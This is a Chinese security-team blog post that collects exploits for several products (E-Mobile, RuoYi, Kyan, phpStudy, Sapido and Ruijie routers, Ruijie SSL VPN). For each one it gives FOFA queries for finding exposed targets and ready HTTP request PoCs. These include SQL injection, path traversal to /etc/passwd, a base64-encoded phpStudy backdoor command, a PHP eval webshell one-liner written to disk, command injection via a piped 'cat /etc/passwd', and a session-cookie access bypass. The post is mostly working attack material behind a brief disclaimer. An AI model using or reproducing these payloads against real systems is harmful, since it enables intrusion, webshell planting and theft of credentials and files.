“ 晚上睡不着的时候,打电话给我,我是一个负责任的男人”
导读
本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!(复现过程略显简单,有需要复现文档的直接去公众号回复“洗澡” 即可)
E-Mobile 前台SQL注入漏洞
1)FOFA语句
E-Mobile 6.6
2)poc
POST /messageType.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=abc2sezIkpTECehgf1vJx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
method=create&typeName=1';CREATE ALIAS sleep222 FOR
"java.lang.Thread.sleep";CALL sleep222(3000);select+'1
若依管理系统后台任意文件读取
1)FOFA语句
app="若依-管理系统"
2)登录后台后访问 Url,存在漏洞直接下载passwd文件
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
3)ky修改文件的路径,下载自己想要的文件
Kyan 网络监控设备账号密码泄露漏洞
1)FOFA语句
title="platform - Login"
2)POC
http://ip/hosts
3)登录界面
phpStudy后门漏洞复现(旧)
1)FOFA语句
title="phpStudy探针2014" //2016,2018都行,只要存在漏洞大致利用方式一样
2)2014的检查是否引用了php_xmlrpc.dll文件(只要引用了该文件,恶意代码就可以触发),通过phpinfo下查看
3)找到accept-encoding: gzip, deflate,把逗号后面的空格删掉,改为accept-encoding: gzip,deflate,然后在accept-encoding: gzip,deflate这行前面或后面加上一行
accept-charset:c3lzdGVtKCdkaXInKTs=
然后发送(这里的c3lzdGVtKCdkaXInKTs=是经过base64加密的)
GET / HTTP/1.1
Host: 118.107.40.93
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Connection: close
accept-charset:c3lzdGVtKCdkaXInKTs=
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0.0"
4)发送数据包
5)发送的命令解码如下
注:此时可以向目标服务器写入一句话
(1)dir:查看当前目录下的内容,可以一层层查看,最后找到WWW目录所在,将一句话写入
(2)chdir:查看当前所在目录,类似于linux中的pwd
(3)利用bp向目标系统指定位置写一句话木马,^表示写入特殊字符,例如<或>。写入后MoBei.php内容为:<?php @eval($_REQUEST[MoBei);?>
payload:
echo ^<?php @eval($_REQUEST[cmd]);?^> > MoBei.php
6)获取网站路径
7)一句话base64加密
8)访问看是否写入成功
9)菜刀连接
Sapido多款路由器命令执行漏洞
1)FOFA语句
app="Sapido-路由器"
2)固件中存在一个asp文件为 **syscmd.asp** 存在命令执行
3)直接输入就可以命令执行了
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650
1)FOFA语句
title="锐捷网络-EWEB网管系统" && icon_hash="-692947551"
2)出现漏洞的文件在***/guest_auth/guestIsUp.php***
//查询用户是否上线了
$userip = @$_POST['ip'];
$usermac = @$_POST['mac'];
if (!$userip || !$usermac) {
exit;
}
/* 判断该用户是否已经放行 */
$cmd = '/sbin/app_auth_hook.elf -f ' . $userip;
$res = exec($cmd, $out, $status);
/* 如果已经上线成功 */
if (strstr($out[0], "status:1")) {
echo 'true';
}
3)通过命令拼接的方式构造命令执行
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > MoBei.txt
4)然后访问页面 /guest_auth/MoBei.txt 就可以看到命令执行的结果
锐捷SSL VPN 越权访问漏洞
1)FOFA语句
icon_hash="884334722" || title="Ruijie SSL VPN"
2)访问目标
http://xxx.xxx.xxx.xxx/cgi-bin/installjava.cgi
3)利用POC
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
其中注意的参数为
Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
UserName 参数为已知用户名
漏洞无法利用(根据请求包使用Burp进行用户名爆破)
4)用户名正确时会返回敏感信息
5)通过此方法知道用户名后可以通过漏洞修改账号参数
访问 http://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres
其他一些比较老的漏洞
声明下:下面的这些漏洞大部分已经修护了,收集的文档,需要的看看下面获取方式吧!
PS:获取方式-公众号回复“洗澡”
- - - - - - - - - - - - - - - END - - - - - - - - - - ----------
点关注,不迷路
觉得不错的帮忙点个“赞”,“在看” ~~~
原文始发于微信公众号(五六七安全团队):有手就行~
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论